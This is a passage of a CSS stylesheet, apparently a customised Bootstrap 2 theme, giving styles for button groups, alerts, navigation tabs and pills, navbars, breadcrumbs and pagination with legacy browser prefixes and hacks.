	-moz-box-shadow: inset 0 2px 4px rgba(0,0,0,.15), 0 1px 2px rgba(0,0,0,.05);
	box-shadow: inset 0 2px 4px rgba(0,0,0,.15), 0 1px 2px rgba(0,0,0,.05);
}
.btn-group.open .btn.dropdown-toggle {
	background-color: #e6e6e6;
}
.btn-group.open .btn-primary.dropdown-toggle {
	background-color: #002f8d;
}
.btn-group.open .btn-warning.dropdown-toggle {
	background-color: #f89406;
}
.btn-group.open .btn-danger.dropdown-toggle {
	background-color: #bd362f;
}
.btn-group.open .btn-success.dropdown-toggle {
	background-color: #51a351;
}
.btn-group.open .btn-info.dropdown-toggle {
	background-color: #2f96b4;
}
.btn-group.open .btn-inverse.dropdown-toggle {
	background-color: #222;
}
.btn .caret {
	margin-top: 8px;
	margin-left: 0;
}
.btn-large .caret {
	margin-top: 6px;
}
.btn-large .caret {
	border-left-width: 5px;
	border-right-width: 5px;
	border-top-width: 5px;
}
.btn-mini .caret,
.btn-small .caret {
	margin-top: 8px;
}
.dropup .btn-large .caret {
	border-bottom-width: 5px;
}
.btn-primary .caret,
.btn-warning .caret,
.btn-danger .caret,
.btn-info .caret,
.btn-success .caret,
.btn-inverse .caret {
	border-top-color: #fff;
	border-bottom-color: #fff;
}
.btn-group-vertical {
	display: inline-block;
	*display: inline;
	*zoom: 1;
}
.btn-group-vertical > .btn {
	display: block;
	float: none;
	max-width: 100%;
	-webkit-border-radius: 0;
	-moz-border-radius: 0;
	border-radius: 0;
}
.btn-group-vertical > .btn + .btn {
	margin-left: 0;
	margin-top: -1px;
}
.btn-group-vertical > .btn:first-child {
	-webkit-border-radius: 4px 4px 0 0;
	-moz-border-radius: 4px 4px 0 0;
	border-radius: 4px 4px 0 0;
}
.btn-group-vertical > .btn:last-child {
	-webkit-border-radius: 0 0 4px 4px;
	-moz-border-radius: 0 0 4px 4px;
	border-radius: 0 0 4px 4px;
}
.btn-group-vertical > .btn-large:first-child {
	-webkit-border-radius: 6px 6px 0 0;
	-moz-border-radius: 6px 6px 0 0;
	border-radius: 6px 6px 0 0;
}
.btn-group-vertical > .btn-large:last-child {
	-webkit-border-radius: 0 0 6px 6px;
	-moz-border-radius: 0 0 6px 6px;
	border-radius: 0 0 6px 6px;
}
.alert {
	padding: 8px 35px 8px 14px;
	margin-bottom: 18px;
	text-shadow: 0 1px 0 rgba(255,255,255,0.5);
	background-color: #fcf8e3;
	border: 1px solid #fbeed5;
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
}
.alert,
.alert h4 {
	color: #c09853;
}
.alert h4 {
	margin: 0 0 .5em;
}
.alert .close {
	position: relative;
	top: -2px;
	right: -21px;
	line-height: 18px;
	cursor: pointer;
}
.alert-success {
	background-color: #dff0d8;
	border-color: #d6e9c6;
	color: #468847;
}
.alert-success h4 {
	color: #468847;
}
.alert-danger,
.alert-error {
	background-color: #f2dede;
	border-color: #eed3d7;
	color: #b94a48;
}
.alert-danger h4,
.alert-error h4 {
	color: #b94a48;
}
.alert-info {
	background-color: #d9edf7;
	border-color: #bce8f1;
	color: #3a87ad;
}
.alert-info h4 {
	color: #3a87ad;
}
.alert-block {
	padding-top: 14px;
	padding-bottom: 14px;
}
.alert-block > p,
.alert-block > ul {
	margin-bottom: 0;
}
.alert-block p + p {
	margin-top: 5px;
}
.nav {
	margin-left: 0;
	margin-bottom: 18px;
	list-style: none;
}
.nav > li > a {
	display: block;
}
.nav > li > a:hover,
.nav > li > a:focus {
	text-decoration: none;
	background-color: #eee;
}
.nav > li > a > img {
	max-width: none;
}
.nav > .pull-right {
	float: right;
}
.nav-header {
	display: block;
	padding: 3px 15px;
	font-size: 11px;
	font-weight: bold;
	line-height: 18px;
	color: #999;
	text-shadow: 0 1px 0 rgba(255,255,255,0.5);
	text-transform: uppercase;
}
.nav li + .nav-header {
	margin-top: 9px;
}
.nav-list {
	padding-left: 15px;
	padding-right: 15px;
	margin-bottom: 0;
}
.nav-list > li > a,
.nav-list .nav-header {
	margin-left: -15px;
	margin-right: -15px;
	text-shadow: 0 1px 0 rgba(255,255,255,0.5);
}
.nav-list > li > a {
	padding: 3px 15px;
}
.nav-list > .active > a,
.nav-list > .active > a:hover,
.nav-list > .active > a:focus {
	color: #fff;
	text-shadow: 0 -1px 0 rgba(0,0,0,0.2);
	background-color: #005e8d;
}
.nav-list [class^="icon-"],
.nav-list [class*=" icon-"] {
	margin-right: 2px;
}
.nav-list .divider {
	*width: 100%;
	height: 1px;
	margin: 8px 1px;
	*margin: -5px 0 5px;
	overflow: hidden;
	background-color: #e5e5e5;
	border-bottom: 1px solid #fff;
}
.nav-tabs,
.nav-pills {
	*zoom: 1;
}
.nav-tabs:before,
.nav-tabs:after,
.nav-pills:before,
.nav-pills:after {
	display: table;
	content: "";
	line-height: 0;
}
.nav-tabs:after,
.nav-pills:after {
	clear: both;
}
.nav-tabs > li,
.nav-pills > li {
	float: left;
}
.nav-tabs > li > a,
.nav-pills > li > a {
	padding-right: 12px;
	padding-left: 12px;
	margin-right: 2px;
	line-height: 14px;
}
.nav-tabs {
	border-bottom: 1px solid #ddd;
}
.nav-tabs > li {
	margin-bottom: -1px;
}
.nav-tabs > li > a {
	padding-top: 8px;
	padding-bottom: 8px;
	line-height: 18px;
	border: 1px solid transparent;
	-webkit-border-radius: 4px 4px 0 0;
	-moz-border-radius: 4px 4px 0 0;
	border-radius: 4px 4px 0 0;
}
.nav-tabs > li > a:hover,
.nav-tabs > li > a:focus {
	border-color: #eee #eee #ddd;
}
.nav-tabs > .active > a,
.nav-tabs > .active > a:hover,
.nav-tabs > .active > a:focus {
	color: #555;
	background-color: #fff;
	border: 1px solid #ddd;
	border-bottom-color: transparent;
	cursor: default;
}
.nav-pills > li > a {
	padding-top: 8px;
	padding-bottom: 8px;
	margin-top: 2px;
	margin-bottom: 2px;
	-webkit-border-radius: 5px;
	-moz-border-radius: 5px;
	border-radius: 5px;
}
.nav-pills > .active > a,
.nav-pills > .active > a:hover,
.nav-pills > .active > a:focus {
	color: #fff;
	background-color: #005e8d;
}
.nav-stacked > li {
	float: none;
}
.nav-stacked > li > a {
	margin-right: 0;
}
.nav-tabs.nav-stacked {
	border-bottom: 0;
}
.nav-tabs.nav-stacked > li > a {
	border: 1px solid #ddd;
	-webkit-border-radius: 0;
	-moz-border-radius: 0;
	border-radius: 0;
}
.nav-tabs.nav-stacked > li:first-child > a {
	-webkit-border-top-right-radius: 4px;
	-moz-border-radius-topright: 4px;
	border-top-right-radius: 4px;
	-webkit-border-top-left-radius: 4px;
	-moz-border-radius-topleft: 4px;
	border-top-left-radius: 4px;
}
.nav-tabs.nav-stacked > li:last-child > a {
	-webkit-border-bottom-right-radius: 4px;
	-moz-border-radius-bottomright: 4px;
	border-bottom-right-radius: 4px;
	-webkit-border-bottom-left-radius: 4px;
	-moz-border-radius-bottomleft: 4px;
	border-bottom-left-radius: 4px;
}
.nav-tabs.nav-stacked > li > a:hover,
.nav-tabs.nav-stacked > li > a:focus {
	border-color: #ddd;
	z-index: 2;
}
.nav-pills.nav-stacked > li > a {
	margin-bottom: 3px;
}
.nav-pills.nav-stacked > li:last-child > a {
	margin-bottom: 1px;
}
.nav-tabs .dropdown-menu {
	-webkit-border-radius: 0 0 6px 6px;
	-moz-border-radius: 0 0 6px 6px;
	border-radius: 0 0 6px 6px;
}
.nav-pills .dropdown-menu {
	-webkit-border-radius: 6px;
	-moz-border-radius: 6px;
	border-radius: 6px;
}
.nav .dropdown-toggle .caret {
	border-top-color: #005e8d;
	border-bottom-color: #005e8d;
	margin-top: 6px;
}
.nav .dropdown-toggle:hover .caret,
.nav .dropdown-toggle:focus .caret {
	border-top-color: #002b41;
	border-bottom-color: #002b41;
}
.nav-tabs .dropdown-toggle .caret {
	margin-top: 8px;
}
.nav .active .dropdown-toggle .caret {
	border-top-color: #fff;
	border-bottom-color: #fff;
}
.nav-tabs .active .dropdown-toggle .caret {
	border-top-color: #555;
	border-bottom-color: #555;
}
.nav > .dropdown.active > a:hover,
.nav > .dropdown.active > a:focus {
	cursor: pointer;
}
.nav-tabs .open .dropdown-toggle,
.nav-pills .open .dropdown-toggle,
.nav > li.dropdown.open.active > a:hover,
.nav > li.dropdown.open.active > a:focus {
	color: #fff;
	background-color: #999;
	border-color: #999;
}
.nav li.dropdown.open .caret,
.nav li.dropdown.open.active .caret,
.nav li.dropdown.open a:hover .caret,
.nav li.dropdown.open a:focus .caret {
	border-top-color: #fff;
	border-bottom-color: #fff;
	opacity: 1;
	filter: alpha(opacity=100);
}
.tabs-stacked .open > a:hover,
.tabs-stacked .open > a:focus {
	border-color: #999;
}
.tabbable {
	*zoom: 1;
}
.tabbable:before,
.tabbable:after {
	display: table;
	content: "";
	line-height: 0;
}
.tabbable:after {
	clear: both;
}
.tab-content {
	overflow: auto;
}
.tabs-below > .nav-tabs,
.tabs-right > .nav-tabs,
.tabs-left > .nav-tabs {
	border-bottom: 0;
}
.tab-content > .tab-pane,
.pill-content > .pill-pane {
	display: none;
}
.tab-content > .active,
.pill-content > .active {
	display: block;
}
.tabs-below > .nav-tabs {
	border-top: 1px solid #ddd;
}
.tabs-below > .nav-tabs > li {
	margin-top: -1px;
	margin-bottom: 0;
}
.tabs-below > .nav-tabs > li > a {
	-webkit-border-radius: 0 0 4px 4px;
	-moz-border-radius: 0 0 4px 4px;
	border-radius: 0 0 4px 4px;
}
.tabs-below > .nav-tabs > li > a:hover,
.tabs-below > .nav-tabs > li > a:focus {
	border-bottom-color: transparent;
	border-top-color: #ddd;
}
.tabs-below > .nav-tabs > .active > a,
.tabs-below > .nav-tabs > .active > a:hover,
.tabs-below > .nav-tabs > .active > a:focus {
	border-color: transparent #ddd #ddd #ddd;
}
.tabs-left > .nav-tabs > li,
.tabs-right > .nav-tabs > li {
	float: none;
}
.tabs-left > .nav-tabs > li > a,
.tabs-right > .nav-tabs > li > a {
	min-width: 74px;
	margin-right: 0;
	margin-bottom: 3px;
}
.tabs-left > .nav-tabs {
	float: left;
	margin-right: 19px;
	border-right: 1px solid #ddd;
}
.tabs-left > .nav-tabs > li > a {
	margin-right: -1px;
	-webkit-border-radius: 4px 0 0 4px;
	-moz-border-radius: 4px 0 0 4px;
	border-radius: 4px 0 0 4px;
}
.tabs-left > .nav-tabs > li > a:hover,
.tabs-left > .nav-tabs > li > a:focus {
	border-color: #eee #ddd #eee #eee;
}
.tabs-left > .nav-tabs .active > a,
.tabs-left > .nav-tabs .active > a:hover,
.tabs-left > .nav-tabs .active > a:focus {
	border-color: #ddd transparent #ddd #ddd;
	*border-right-color: #fff;
}
.tabs-right > .nav-tabs {
	float: right;
	margin-left: 19px;
	border-left: 1px solid #ddd;
}
.tabs-right > .nav-tabs > li > a {
	margin-left: -1px;
	-webkit-border-radius: 0 4px 4px 0;
	-moz-border-radius: 0 4px 4px 0;
	border-radius: 0 4px 4px 0;
}
.tabs-right > .nav-tabs > li > a:hover,
.tabs-right > .nav-tabs > li > a:focus {
	border-color: #eee #eee #eee #ddd;
}
.tabs-right > .nav-tabs .active > a,
.tabs-right > .nav-tabs .active > a:hover,
.tabs-right > .nav-tabs .active > a:focus {
	border-color: #ddd #ddd #ddd transparent;
	*border-left-color: #fff;
}
.nav > .disabled > a {
	color: #999;
}
.nav > .disabled > a:hover,
.nav > .disabled > a:focus {
	text-decoration: none;
	background-color: transparent;
	cursor: default;
}
.navbar {
	overflow: visible;
	margin-bottom: 18px;
	*position: relative;
	*z-index: 2;
}
.navbar-inner {
	min-height: 40px;
	padding-left: 20px;
	padding-right: 20px;
	background-color: #fafafa;
	background-image: -moz-linear-gradient(top,#ffffff,#f2f2f2);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#ffffff),to(#f2f2f2));
	background-image: -webkit-linear-gradient(top,#ffffff,#f2f2f2);
	background-image: -o-linear-gradient(top,#ffffff,#f2f2f2);
	background-image: linear-gradient(to bottom,#ffffff,#f2f2f2);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffffff', endColorstr='#fff2f2f2', GradientType=0);
	border: 1px solid #d4d4d4;
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
	-webkit-box-shadow: 0 1px 4px rgba(0,0,0,0.065);
	-moz-box-shadow: 0 1px 4px rgba(0,0,0,0.065);
	box-shadow: 0 1px 4px rgba(0,0,0,0.065);
	*zoom: 1;
}
.navbar-inner:before,
.navbar-inner:after {
	display: table;
	content: "";
	line-height: 0;
}
.navbar-inner:after {
	clear: both;
}
.navbar .container {
	width: auto;
}
.nav-collapse.collapse {
	height: auto;
	overflow: visible;
}
.navbar .brand {
	float: left;
	display: block;
	padding: 11px 20px 11px;
	margin-left: -20px;
	font-size: 20px;
	font-weight: 200;
	color: #555;
	text-shadow: 0 1px 0 #ffffff;
}
.navbar .brand:hover,
.navbar .brand:focus {
	text-decoration: none;
}
.navbar-text {
	margin-bottom: 0;
	line-height: 40px;
	color: #555;
}
.navbar-link {
	color: #555;
}
.navbar-link:hover,
.navbar-link:focus {
	color: #333;
}
.navbar .divider-vertical {
	height: 40px;
	margin: 0 9px;
	border-left: 1px solid #f2f2f2;
	border-right: 1px solid #ffffff;
}
.navbar .btn,
.navbar .btn-group {
	margin-top: 5px;
}
.navbar .btn-group .btn,
.navbar .input-prepend .btn,
.navbar .input-append .btn,
.navbar .input-prepend .btn-group,
.navbar .input-append .btn-group {
	margin-top: 0;
}
.navbar-form {
	margin-bottom: 0;
	*zoom: 1;
}
.navbar-form:before,
.navbar-form:after {
	display: table;
	content: "";
	line-height: 0;
}
.navbar-form:after {
	clear: both;
}
.navbar-form input,
.navbar-form select,
.navbar-form .radio,
.navbar-form .checkbox {
	margin-top: 5px;
}
.navbar-form input,
.navbar-form select,
.navbar-form .btn {
	display: inline-block;
	margin-bottom: 0;
}
.navbar-form input[type="image"],
.navbar-form input[type="checkbox"],
.navbar-form input[type="radio"] {
	margin-top: 3px;
}
.navbar-form .input-append,
.navbar-form .input-prepend {
	margin-top: 5px;
	white-space: nowrap;
}
.navbar-form .input-append input,
.navbar-form .input-prepend input {
	margin-top: 0;
}
.navbar-search {
	position: relative;
	float: left;
	margin-top: 5px;
	margin-bottom: 0;
}
.navbar-search .search-query {
	margin-bottom: 0;
	padding: 4px 14px;
	font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
	font-size: 13px;
	font-weight: normal;
	line-height: 1;
	-webkit-border-radius: 15px;
	-moz-border-radius: 15px;
	border-radius: 15px;
}
.navbar-static-top {
	position: static;
	margin-bottom: 0;
}
.navbar-static-top .navbar-inner {
	-webkit-border-radius: 0;
	-moz-border-radius: 0;
	border-radius: 0;
}
.navbar-fixed-top,
.navbar-fixed-bottom {
	position: fixed;
	right: 0;
	left: 0;
	z-index: 1030;
	margin-bottom: 0;
}
.navbar-fixed-top .navbar-inner,
.navbar-static-top .navbar-inner {
	border-width: 0 0 1px;
}
.navbar-fixed-bottom .navbar-inner {
	border-width: 1px 0 0;
}
.navbar-fixed-top .navbar-inner,
.navbar-fixed-bottom .navbar-inner {
	padding-left: 0;
	padding-right: 0;
	-webkit-border-radius: 0;
	-moz-border-radius: 0;
	border-radius: 0;
}
.navbar-static-top .container,
.navbar-fixed-top .container,
.navbar-fixed-bottom .container {
	width: 940px;
}
.navbar-fixed-top {
	top: 0;
}
.navbar-fixed-top .navbar-inner,
.navbar-static-top .navbar-inner {
	-webkit-box-shadow: 0 1px 10px rgba(0,0,0,.1);
	-moz-box-shadow: 0 1px 10px rgba(0,0,0,.1);
	box-shadow: 0 1px 10px rgba(0,0,0,.1);
}
.navbar-fixed-bottom {
	bottom: 0;
}
.navbar-fixed-bottom .navbar-inner {
	-webkit-box-shadow: 0 -1px 10px rgba(0,0,0,.1);
	-moz-box-shadow: 0 -1px 10px rgba(0,0,0,.1);
	box-shadow: 0 -1px 10px rgba(0,0,0,.1);
}
.navbar .nav {
	position: relative;
	left: 0;
	display: block;
	float: left;
	margin: 0 10px 0 0;
}
.navbar .nav.pull-right {
	float: right;
	margin-right: 0;
}
.navbar .nav > li {
	float: left;
}
.navbar .nav > li > a {
	float: none;
	padding: 11px 15px 11px;
	color: #555;
	text-decoration: none;
	text-shadow: 0 1px 0 #ffffff;
}
.navbar .nav .dropdown-toggle .caret {
	margin-top: 8px;
}
.navbar .nav > li > a:focus,
.navbar .nav > li > a:hover {
	background-color: transparent;
	color: #333;
	text-decoration: none;
}
.navbar .nav > li > a:focus {
	outline: 2px solid #5e9ed6;
}
.navbar .nav > .active > a,
.navbar .nav > .active > a:hover,
.navbar .nav > .active > a:focus {
	color: #555;
	text-decoration: none;
	background-color: #e6e6e6;
	-webkit-box-shadow: inset 0 3px 8px rgba(0,0,0,0.125);
	-moz-box-shadow: inset 0 3px 8px rgba(0,0,0,0.125);
	box-shadow: inset 0 3px 8px rgba(0,0,0,0.125);
}
.navbar .btn-navbar {
	display: none;
	float: right;
	padding: 7px 10px;
	margin-left: 5px;
	margin-right: 5px;
	color: #fff;
	text-shadow: 0 -1px 0 rgba(0,0,0,0.25);
	background-color: #ededed;
	background-image: -moz-linear-gradient(top,#f2f2f2,#e6e6e6);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#f2f2f2),to(#e6e6e6));
	background-image: -webkit-linear-gradient(top,#f2f2f2,#e6e6e6);
	background-image: -o-linear-gradient(top,#f2f2f2,#e6e6e6);
	background-image: linear-gradient(to bottom,#f2f2f2,#e6e6e6);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#fff2f2f2', endColorstr='#ffe5e5e5', GradientType=0);
	border-color: #e6e6e6 #e6e6e6 #bfbfbf;
	*background-color: #e6e6e6;
	filter: progid:DXImageTransform.Microsoft.gradient(enabled = false);
	-webkit-box-shadow: inset 0 1px 0 rgba(255,255,255,.1), 0 1px 0 rgba(255,255,255,.075);
	-moz-box-shadow: inset 0 1px 0 rgba(255,255,255,.1), 0 1px 0 rgba(255,255,255,.075);
	box-shadow: inset 0 1px 0 rgba(255,255,255,.1), 0 1px 0 rgba(255,255,255,.075);
}
.navbar .btn-navbar:hover,
.navbar .btn-navbar:focus,
.navbar .btn-navbar:active,
.navbar .btn-navbar.active,
.navbar .btn-navbar.disabled,
.navbar .btn-navbar[disabled] {
	color: #fff;
	background-color: #e6e6e6;
	*background-color: #d9d9d9;
}
.navbar .btn-navbar:active,
.navbar .btn-navbar.active {
	background-color: #cccccc \9;
}
.navbar .btn-navbar .icon-bar {
	display: block;
	width: 18px;
	height: 2px;
	background-color: #f5f5f5;
	-webkit-border-radius: 1px;
	-moz-border-radius: 1px;
	border-radius: 1px;
	-webkit-box-shadow: 0 1px 0 rgba(0,0,0,0.25);
	-moz-box-shadow: 0 1px 0 rgba(0,0,0,0.25);
	box-shadow: 0 1px 0 rgba(0,0,0,0.25);
}
.btn-navbar .icon-bar + .icon-bar {
	margin-top: 3px;
}
.navbar .nav > li > .dropdown-menu:before {
	content: '';
	display: inline-block;
	border-left: 7px solid transparent;
	border-right: 7px solid transparent;
	border-bottom: 7px solid #ccc;
	border-bottom-color: rgba(0,0,0,0.2);
	position: absolute;
	top: -7px;
	left: 9px;
}
.navbar .nav > li > .dropdown-menu:after {
	content: '';
	display: inline-block;
	border-left: 6px solid transparent;
	border-right: 6px solid transparent;
	border-bottom: 6px solid #fff;
	position: absolute;
	top: -6px;
	left: 10px;
}
.navbar-fixed-bottom .nav > li > .dropdown-menu:before {
	border-top: 7px solid #ccc;
	border-top-color: rgba(0,0,0,0.2);
	border-bottom: 0;
	bottom: -7px;
	top: auto;
}
.navbar-fixed-bottom .nav > li > .dropdown-menu:after {
	border-top: 6px solid #fff;
	border-bottom: 0;
	bottom: -6px;
	top: auto;
}
.navbar .nav li.dropdown > a:hover .caret,
.navbar .nav li.dropdown > a:focus .caret {
	border-top-color: #333;
	border-bottom-color: #333;
}
.navbar .nav li.dropdown.open > .dropdown-toggle,
.navbar .nav li.dropdown.active > .dropdown-toggle,
.navbar .nav li.dropdown.open.active > .dropdown-toggle {
	background-color: #e6e6e6;
	color: #555;
}
.navbar .nav li.dropdown > .dropdown-toggle .caret {
	border-top-color: #555;
	border-bottom-color: #555;
}
.navbar .nav li.dropdown.open > .dropdown-toggle .caret,
.navbar .nav li.dropdown.active > .dropdown-toggle .caret,
.navbar .nav li.dropdown.open.active > .dropdown-toggle .caret {
	border-top-color: #555;
	border-bottom-color: #555;
}
.navbar .pull-right > li > .dropdown-menu,
.navbar .nav > li > .dropdown-menu.pull-right {
	left: auto;
	right: 0;
}
.navbar .pull-right > li > .dropdown-menu:before,
.navbar .nav > li > .dropdown-menu.pull-right:before {
	left: auto;
	right: 12px;
}
.navbar .pull-right > li > .dropdown-menu:after,
.navbar .nav > li > .dropdown-menu.pull-right:after {
	left: auto;
	right: 13px;
}
.navbar .pull-right > li > .dropdown-menu .dropdown-menu,
.navbar .nav > li > .dropdown-menu.pull-right .dropdown-menu {
	left: auto;
	right: 100%;
	margin-left: 0;
	margin-right: -1px;
	-webkit-border-radius: 6px 0 6px 6px;
	-moz-border-radius: 6px 0 6px 6px;
	border-radius: 6px 0 6px 6px;
}
.navbar-inverse .navbar-inner {
	background-color: #1b1b1b;
	background-image: -moz-linear-gradient(top,#222222,#111111);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#222222),to(#111111));
	background-image: -webkit-linear-gradient(top,#222222,#111111);
	background-image: -o-linear-gradient(top,#222222,#111111);
	background-image: linear-gradient(to bottom,#222222,#111111);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff222222', endColorstr='#ff111111', GradientType=0);
	border-color: #252525;
}
.navbar-inverse .brand,
.navbar-inverse .nav > li > a {
	color: #999;
	text-shadow: 0 -1px 0 rgba(0,0,0,0.25);
}
.navbar-inverse .brand:hover,
.navbar-inverse .brand:focus,
.navbar-inverse .nav > li > a:hover,
.navbar-inverse .nav > li > a:focus {
	color: #fff;
}
.navbar-inverse .brand {
	color: #999;
}
.navbar-inverse .navbar-text {
	color: #999;
}
.navbar-inverse .nav > li > a:focus,
.navbar-inverse .nav > li > a:hover {
	background-color: transparent;
	color: #fff;
}
.navbar-inverse .nav .active > a,
.navbar-inverse .nav .active > a:hover,
.navbar-inverse .nav .active > a:focus {
	color: #fff;
	background-color: #111111;
}
.navbar-inverse .navbar-link {
	color: #999;
}
.navbar-inverse .navbar-link:hover,
.navbar-inverse .navbar-link:focus {
	color: #fff;
}
.navbar-inverse .divider-vertical {
	border-left-color: #111111;
	border-right-color: #222222;
}
.navbar-inverse .nav li.dropdown.open > .dropdown-toggle,
.navbar-inverse .nav li.dropdown.active > .dropdown-toggle,
.navbar-inverse .nav li.dropdown.open.active > .dropdown-toggle {
	background-color: #111111;
	color: #fff;
}
.navbar-inverse .nav li.dropdown > a:hover .caret,
.navbar-inverse .nav li.dropdown > a:focus .caret {
	border-top-color: #fff;
	border-bottom-color: #fff;
}
.navbar-inverse .nav li.dropdown > .dropdown-toggle .caret {
	border-top-color: #999;
	border-bottom-color: #999;
}
.navbar-inverse .nav li.dropdown.open > .dropdown-toggle .caret,
.navbar-inverse .nav li.dropdown.active > .dropdown-toggle .caret,
.navbar-inverse .nav li.dropdown.open.active > .dropdown-toggle .caret {
	border-top-color: #fff;
	border-bottom-color: #fff;
}
.navbar-inverse .navbar-search .search-query {
	color: #fff;
	background-color: #515151;
	border-color: #111111;
	-webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,.1), 0 1px 0 rgba(255,255,255,.15);
	-moz-box-shadow: inset 0 1px 2px rgba(0,0,0,.1), 0 1px 0 rgba(255,255,255,.15);
	box-shadow: inset 0 1px 2px rgba(0,0,0,.1), 0 1px 0 rgba(255,255,255,.15);
	-webkit-transition: none;
	-moz-transition: none;
	-o-transition: none;
	transition: none;
}
.navbar-inverse .navbar-search .search-query:-moz-placeholder {
	color: #ccc;
}
.navbar-inverse .navbar-search .search-query:-ms-input-placeholder {
	color: #ccc;
}
.navbar-inverse .navbar-search .search-query::-webkit-input-placeholder {
	color: #ccc;
}
.navbar-inverse .navbar-search .search-query:focus,
.navbar-inverse .navbar-search .search-query.focused {
	padding: 5px 15px;
	color: #333;
	text-shadow: 0 1px 0 #fff;
	background-color: #fff;
	border: 0;
	-webkit-box-shadow: 0 0 3px rgba(0,0,0,0.15);
	-moz-box-shadow: 0 0 3px rgba(0,0,0,0.15);
	box-shadow: 0 0 3px rgba(0,0,0,0.15);
	outline: 0;
}
.navbar-inverse .btn-navbar {
	color: #fff;
	text-shadow: 0 -1px 0 rgba(0,0,0,0.25);
	background-color: #0e0e0e;
	background-image: -moz-linear-gradient(top,#151515,#040404);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#151515),to(#040404));
	background-image: -webkit-linear-gradient(top,#151515,#040404);
	background-image: -o-linear-gradient(top,#151515,#040404);
	background-image: linear-gradient(to bottom,#151515,#040404);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff151515', endColorstr='#ff040404', GradientType=0);
	border-color: #040404 #040404 #000000;
	*background-color: #040404;
	filter: progid:DXImageTransform.Microsoft.gradient(enabled = false);
}
.navbar-inverse .btn-navbar:hover,
.navbar-inverse .btn-navbar:focus,
.navbar-inverse .btn-navbar:active,
.navbar-inverse .btn-navbar.active,
.navbar-inverse .btn-navbar.disabled,
.navbar-inverse .btn-navbar[disabled] {
	color: #fff;
	background-color: #040404;
	*background-color: #000000;
}
.navbar-inverse .btn-navbar:active,
.navbar-inverse .btn-navbar.active {
	background-color: #000000 \9;
}
.breadcrumb {
	padding: 8px 15px;
	margin: 0 0 18px;
	list-style: none;
	background-color: #f5f5f5;
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
}
.breadcrumb > li {
	display: inline-block;
	*display: inline;
	*zoom: 1;
	text-shadow: 0 1px 0 #fff;
}
.breadcrumb > li > .divider {
	padding: 0 5px;
	color: #ccc;
}
.breadcrumb > .active {
	color: #999;
}
.pagination {
	margin: 18px 0;
}
.pagination ul {
	display: inline-block;
	*display: inline;
	*zoom: 1;
	margin-left: 0;
	margin-bottom: 0;
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
	-webkit-box-shadow: 0 1px 2px rgba(0,0,0,0.05);
	-moz-box-shadow: 0 1px 2px rgba(0,0,0,0.05);
	box-shadow: 0 1px 2px rgba(0,0,0,0.05);
}
.pagination ul > li {
	display: inline;
}
.pagination ul > li > a,
.pagination ul > li > span {
	float: left;
	padding: 4px 12px;
	line-height: 18px;
	text-decoration: none;
	background-color: #fff;
	border: 1px solid #ddd;
	border-left-width: 0;
}
.pagination ul > li > a:hover,
.pagination ul > li > a:focus,
.pagination ul > .active > a,
.pagination ul > .active > span {
	background-color: #f5f5f5;
}
.pagination ul > .active > a,
.pagination ul > .active > span {
	color: #999;
	cursor: default;
}
.pagination ul > .disabled > span,
.pagination ul > .disabled > a,
.pagination ul > .disabled > a:hover,
.pagination ul > .disabled > a:focus {
	color: #999;
	background-color: transparent;
	cursor: default;
}
.pagination ul > li:first-child > a,
.pagination ul > li:first-child > span {
	border-left-width: 1px;
	-webkit-border-top-left-radius: 4px;
	-moz-border-radius-topleft: 4px;
	border-top-left-radius: 4px;
	-webkit-border-bottom-left-radius: 4px;
	-moz-border-radius-bottomleft: 4px;
	border-bottom-left-radius: 4px;
}
.pagination ul > li:last-child > a,
.pagination ul > li:last-child > span {
	-webkit-border-top-right-radius: 4px;
	-moz-border-radius-topright: 4px;
	border-top-right-radius: 4px;
	-webkit-border-bottom-right-radius: 4px;
	-moz-border-radius-bottomright: 4px;
	border-bottom-right-radius: 4px;
}
.pagination-centered {
	text-align: center;
}
.pagination-right {
	text-align: right;
}
.pagination-large ul > li > a,
.pagination-large ul > li > span {
	padding: 11px 19px;
	font-size: 16.25px;
}
.pagination-large ul > li:first-child > a,
.pagination-large ul > li:first-child > span {
	-webkit-border-top-left-radius: 6px;
	-moz-border-radius-topleft: 6px;
	border-top-left-radius: 6px;
	-webkit-border-bottom-left-radius: 6px;
	-moz-border-radius-bottomleft: 6px;
	border-bottom-left-radius: 6px;
}
.pagination-large ul > li:last-child > a,
.pagination-large ul > li:last-child > span {
	-webkit-border-top-right-radius: 6px;
	-moz-border-radius-topright: 6px;
	border-top-right-radius: 6px;
	-webkit-border-bottom-right-radius: 6px;
	-moz-border-radius-bottomright: 6px;
	border-bottom-right-radius: 6px;
}
.pagination-mini ul > li:first-child > a,
.pagination-mini ul > li:first-child > span,
.pagination-small ul > li:first-child > a,
.pagination-small ul > li:first-child > span {
	-webkit-border-top-left-radius: 3px;
	-moz-border-radius-topleft: 3px;
	border-top-left-radius: 3px;
	-webkit-border-bottom-left-radius: 3px;
	-moz-border-radius-bottomleft: 3px;
	border-bottom-left-radius: 3px;
}
.pagination-mini ul > li:last-child > a,
.pagination-mini ul > li:last-child > span,
.pagination-small ul > li:last-child > a,
.pagination-small ul > li:last-child > span {
	-webkit-border-top-right-radius: 3px;
	-moz-border-radius-topright: 3px;
	border-top-right-radius: 3px;
	-webkit-border-bottom-right-radius: 3px;
	-moz-border-radius-bottomright: 3px;
	border-bottom-right-radius: 3px;
}
.pagination-small ul > li > a,
.pagination-small ul > li > span {
	padding: 2px 10px;
	font-size: 12px;
}
.pagination-mini ul > li > a,
.pagination-mini ul > li > span {
	padding: 0 6px;
	font-size: 9.75px;
}
.pager {
	margin: 18px 0;
	list-style: none;
	text-align: center;
	*zoom: 1;
}
.pager:before,
.pager:after {
	display: table;
	content: "";
	line-height: 0;
}
.pager:after {
	clear: both;
}
.pager li {
	display: inline;
}
.pager li > a,
